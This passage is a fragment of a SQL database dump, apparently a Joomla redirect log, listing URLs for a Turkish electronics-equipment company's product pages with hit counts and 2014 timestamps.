00:00:00',301),(2581,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',9,0,'2014-08-13 03:01:14','0000-00-00 00:00:00',301),(2582,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',2,0,'2014-08-13 03:02:57','0000-00-00 00:00:00',301),(2583,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',2,0,'2014-08-13 03:05:13','0000-00-00 00:00:00',301),(2584,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',5,0,'2014-08-13 03:05:58','0000-00-00 00:00:00',301),(2585,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',1,0,'2014-08-13 03:09:19','0000-00-00 00:00:00',301),(2586,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',3,0,'2014-08-13 03:14:37','0000-00-00 00:00:00',301),(2587,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',1,0,'2014-08-13 03:15:57','0000-00-00 00:00:00',301),(2588,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',1,0,'2014-08-13 03:16:18','0000-00-00 00:00:00',301),(2589,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',17,0,'2014-08-13 03:18:14','0000-00-00 00:00:00',301),(2590,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',17,0,'2014-08-13 03:22:29','0000-00-00 00:00:00',301),(2591,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',3,0,'2014-08-13 03:26:34','0000-00-00 00:00:00',301),(2592,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',4,0,'2014-08-13 03:27:52','0000-00-00 00:00:00',301),(2593,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',2,0,'2014-08-13 03:33:54','0000-00-00 00:00:00',301),(2594,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',4,0,'2014-08-13 03:34:30','0000-00-00 00:00:00',301),(2595,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',10,0,'2014-08-13 03:36:43','0000-00-00 00:00:00',301),(2596,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',2,0,'2014-08-13 03:37:39','0000-00-00 00:00:00',301),(2597,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',1,0,'2014-08-13 03:38:39','0000-00-00 00:00:00',301),(2598,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',2,0,'2014-08-13 03:39:34','0000-00-00 00:00:00',301),(2599,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',11,0,'2014-08-13 03:41:09','0000-00-00 00:00:00',301),(2600,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',12,0,'2014-08-13 03:41:39','0000-00-00 00:00:00',301),(2601,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',25,0,'2014-08-13 03:41:39','0000-00-00 00:00:00',301),(2602,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/trackback/','','http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=64%3Aflux&catid=39%3Alehimleme&Itemid=86&lang=en','',1,0,'2014-08-13 03:41:41','0000-00-00 00:00:00',301),(2603,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php/trackback/','','http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=64&Itemid=86&lang=tr','',2,0,'2014-08-13 03:41:49','0000-00-00 00:00:00',301),(2604,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',3,0,'2014-08-13 03:45:28','0000-00-00 00:00:00',301),(2605,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',3,0,'2014-08-13 03:46:09','0000-00-00 00:00:00',301),(2606,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',11,0,'2014-08-13 03:46:12','0000-00-00 00:00:00',301),(2607,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',2,0,'2014-08-13 03:46:50','0000-00-00 00:00:00',301),(2608,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',2,0,'2014-08-13 03:48:59','0000-00-00 00:00:00',301),(2609,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',6,0,'2014-08-13 03:50:07','0000-00-00 00:00:00',301),(2610,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',42,0,'2014-08-13 03:52:18','0000-00-00 00:00:00',301),(2611,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',1,0,'2014-08-13 03:54:37','0000-00-00 00:00:00',301),(2612,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',1,0,'2014-08-13 03:57:49','0000-00-00 00:00:00',301),(2613,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',3,0,'2014-08-13 04:03:29','0000-00-00 00:00:00',301),(2614,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',4,0,'2014-08-13 04:21:25','0000-00-00 00:00:00',301),(2615,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',1,0,'2014-08-13 05:05:09','0000-00-00 00:00:00',301),(2616,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',6,0,'2014-08-13 05:23:57','0000-00-00 00:00:00',301),(2617,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extension','','','',1,0,'2014-08-13 05:27:33','0000-00-00 00:00:00',301),(2618,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',3,0,'2014-08-13 05:35:27','0000-00-00 00:00:00',301),(2619,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',4,0,'2014-08-13 05:58:40','0000-00-00 00:00:00',301),(2620,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142','','','',6,0,'2014-08-13 06:01:06','0000-00-00 00:00:00',301),(2621,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',5,0,'2014-08-13 06:03:32','0000-00-00 00:00:00',301),(2622,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',5,0,'2014-08-13 06:04:46','0000-00-00 00:00:00',301),(2623,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',10,0,'2014-08-13 06:18:10','0000-00-00 00:00:00',301),(2624,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-08-13 06:30:40','0000-00-00 00:00:00',301),(2625,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',1,0,'2014-08-13 06:30:55','0000-00-00 00:00:00',301),(2626,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',5,0,'2014-08-13 06:40:01','0000-00-00 00:00:00',301),(2627,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',2,0,'2014-08-13 07:02:13','0000-00-00 00:00:00',301),(2628,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',8,0,'2014-08-13 07:18:56','0000-00-00 00:00:00',301),(2629,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103','','','',8,0,'2014-08-13 07:28:40','0000-00-00 00:00:00',301),(2630,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',3,0,'2014-08-13 07:33:32','0000-00-00 00:00:00',301),(2631,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157','','','',1,0,'2014-08-13 07:38:24','0000-00-00 00:00:00',301),(2632,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',2,0,'2014-08-13 07:46:45','0000-00-00 00:00:00',301),(2633,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',7,0,'2014-08-13 07:55:25','0000-00-00 00:00:00',301),(2634,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',2,0,'2014-08-13 08:02:14','0000-00-00 00:00:00',301),(2635,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154','','','',2,0,'2014-08-13 08:14:53','0000-00-00 00:00:00',301),(2636,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',6,0,'2014-08-13 08:25:12','0000-00-00 00:00:00',301),(2637,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',7,0,'2014-08-13 08:59:33','0000-00-00 00:00:00',301),(2638,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',4,0,'2014-08-13 09:05:37','0000-00-00 00:00:00',301),(2639,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',2,0,'2014-08-13 09:29:24','0000-00-00 00:00:00',301),(2640,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',1,0,'2014-08-13 09:34:28','0000-00-00 00:00:00',301),(2641,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',1,0,'2014-08-13 09:36:32','0000-00-00 00:00:00',301),(2642,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',5,0,'2014-08-13 09:38:10','0000-00-00 00:00:00',301),(2643,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',5,0,'2014-08-13 09:44:11','0000-00-00 00:00:00',301),(2644,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',14,0,'2014-08-13 10:04:20','0000-00-00 00:00:00',301),(2645,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154','','','',1,0,'2014-08-13 10:11:39','0000-00-00 00:00:00',301),(2646,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',4,0,'2014-08-13 10:18:05','0000-00-00 00:00:00',301),(2647,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129','','','',3,0,'2014-08-13 11:15:58','0000-00-00 00:00:00',301),(2648,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',6,0,'2014-08-13 11:17:11','0000-00-00 00:00:00',301),(2649,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',1,0,'2014-08-13 11:42:11','0000-00-00 00:00:00',301),(2650,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',4,0,'2014-08-13 11:44:36','0000-00-00 00:00:00',301),(2651,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',2,0,'2014-08-13 11:54:35','0000-00-00 00:00:00',301),(2652,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',2,0,'2014-08-13 11:54:35','0000-00-00 00:00:00',301),(2653,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',3,0,'2014-08-13 11:54:37','0000-00-00 00:00:00',301),(2654,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',3,0,'2014-08-13 11:54:38','0000-00-00 00:00:00',301),(2655,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',8,0,'2014-08-13 11:54:51','0000-00-00 00:00:00',301),(2656,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',13,0,'2014-08-13 11:55:00','0000-00-00 00:00:00',301),(2657,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',4,0,'2014-08-13 11:55:01','0000-00-00 00:00:00',301),(2658,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',6,0,'2014-08-13 11:55:02','0000-00-00 00:00:00',301),(2659,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',3,0,'2014-08-13 11:55:04','0000-00-00 00:00:00',301),(2660,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?view=article&catid=1:son-haberler&id=165:microcare&tmpl=component&print=1&layout=default&page=&lang=tr','','','',2,0,'2014-08-13 11:55:08','0000-00-00 00:00:00',301),(2661,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',4,0,'2014-08-13 11:55:16','0000-00-00 00:00:00',301),(2662,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',8,0,'2014-08-13 11:55:17','0000-00-00 00:00:00',301),(2663,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',8,0,'2014-08-13 11:55:17','0000-00-00 00:00:00',301),(2664,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',2,0,'2014-08-13 11:55:17','0000-00-00 00:00:00',301),(2665,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',3,0,'2014-08-13 11:55:51','0000-00-00 00:00:00',301),(2666,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',2,0,'2014-08-13 11:55:51','0000-00-00 00:00:00',301),(2667,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',10,0,'2014-08-13 11:55:52','0000-00-00 00:00:00',301),(2668,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',5,0,'2014-08-13 11:56:04','0000-00-00 00:00:00',301),(2669,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',2,0,'2014-08-13 11:56:05','0000-00-00 00:00:00',301),(2670,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',2,0,'2014-08-13 11:56:05','0000-00-00 00:00:00',301),(2671,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',2,0,'2014-08-13 11:56:06','0000-00-00 00:00:00',301),(2672,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',2,0,'2014-08-13 11:56:06','0000-00-00 00:00:00',301),(2673,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',2,0,'2014-08-13 11:56:07','0000-00-00 00:00:00',301),(2674,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',4,0,'2014-08-13 12:09:33','0000-00-00 00:00:00',301),(2675,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',3,0,'2014-08-13 12:09:34','0000-00-00 00:00:00',301),(2676,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',2,0,'2014-08-13 12:09:44','0000-00-00 00:00:00',301),(2677,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',2,0,'2014-08-13 12:10:43','0000-00-00 00:00:00',301),(2678,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',8,0,'2014-08-13 12:10:44','0000-00-00 00:00:00',301),(2679,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28','','','',7,0,'2014-08-13 12:16:13','0000-00-00 00:00:00',301),(2680,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',2,0,'2014-08-13 12:17:25','0000-00-00 00:00:00',301),(2681,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',4,0,'2014-08-13 12:19:03','0000-00-00 00:00:00',301),(2682,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',5,0,'2014-08-13 12:26:34','0000-00-00 00:00:00',301),(2683,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',4,0,'2014-08-13 12:59:56','0000-00-00 00:00:00',301),(2684,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',2,0,'2014-08-13 12:59:59','0000-00-00 00:00:00',301),(2685,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',4,0,'2014-08-13 13:18:24','0000-00-00 00:00:00',301),(2686,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',1,0,'2014-08-13 13:21:22','0000-00-00 00:00:00',301),(2687,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',3,0,'2014-08-13 13:22:42','0000-00-00 00:00:00',301),(2688,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',6,0,'2014-08-13 13:37:12','0000-00-00 00:00:00',301),(2689,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',2,0,'2014-08-13 13:47:09','0000-00-00 00:00:00',301),(2690,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',7,0,'2014-08-13 14:29:58','0000-00-00 00:00:00',301),(2691,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',8,0,'2014-08-13 14:43:57','0000-00-00 00:00:00',301),(2692,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',3,0,'2014-08-13 14:44:10','0000-00-00 00:00:00',301),(2693,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',2,0,'2014-08-13 14:50:07','0000-00-00 00:00:00',301),(2694,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=99&Itemid=43','','','',3,0,'2014-08-13 14:52:19','0000-00-00 00:00:00',301),(2695,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',8,0,'2014-08-13 16:36:27','0000-00-00 00:00:00',301),(2696,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',1,0,'2014-08-13 17:06:03','0000-00-00 00:00:00',301),(2697,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',4,0,'2014-08-13 17:29:07','0000-00-00 00:00:00',301),(2698,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',3,0,'2014-08-13 17:40:26','0000-00-00 00:00:00',301),(2699,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=39&Itemid=57','','','',2,0,'2014-08-13 17:44:34','0000-00-00 00:00:00',301),(2700,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',9,0,'2014-08-13 17:56:49','0000-00-00 00:00:00',301),(2701,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',11,0,'2014-08-13 18:08:57','0000-00-00 00:00:00',301),(2702,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',7,0,'2014-08-13 18:11:43','0000-00-00 00:00:00',301),(2703,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',3,0,'2014-08-13 18:19:13','0000-00-00 00:00:00',301),(2704,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',3,0,'2014-08-13 18:23:54','0000-00-00 00:00:00',301),(2705,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',5,0,'2014-08-13 18:51:13','0000-00-00 00:00:00',301),(2706,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',4,0,'2014-08-13 19:15:17','0000-00-00 00:00:00',301),(2707,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',4,0,'2014-08-13 19:27:20','0000-00-00 00:00:00',301),(2708,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=126&Itemid=133','','','',3,0,'2014-08-13 19:34:05','0000-00-00 00:00:00',301),(2709,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',4,0,'2014-08-13 19:41:56','0000-00-00 00:00:00',301),(2710,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',5,0,'2014-08-13 20:01:43','0000-00-00 00:00:00',301),(2711,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-08-13 20:02:01','0000-00-00 00:00:00',301),(2712,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',3,0,'2014-08-13 20:05:35','0000-00-00 00:00:00',301),(2713,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',3,0,'2014-08-13 20:17:55','0000-00-00 00:00:00',301),(2714,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',3,0,'2014-08-13 20:25:10','0000-00-00 00:00:00',301),(2715,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=176%3Ajvk1&catid=60%3Aikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-13 20:35:10','0000-00-00 00:00:00',301),(2716,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',1,0,'2014-08-13 20:38:43','0000-00-00 00:00:00',301),(2717,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',4,0,'2014-08-13 20:45:42','0000-00-00 00:00:00',301),(2718,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-13 20:51:45','0000-00-00 00:00:00',301),(2719,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=43&Itemid=2','','','',3,0,'2014-08-13 21:04:04','0000-00-00 00:00:00',301),(2720,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',5,0,'2014-08-13 21:16:00','0000-00-00 00:00:00',301),(2721,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-08-13 21:21:27','0000-00-00 00:00:00',301),(2722,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=56&Itemid=137','','','',1,0,'2014-08-13 21:31:07','0000-00-00 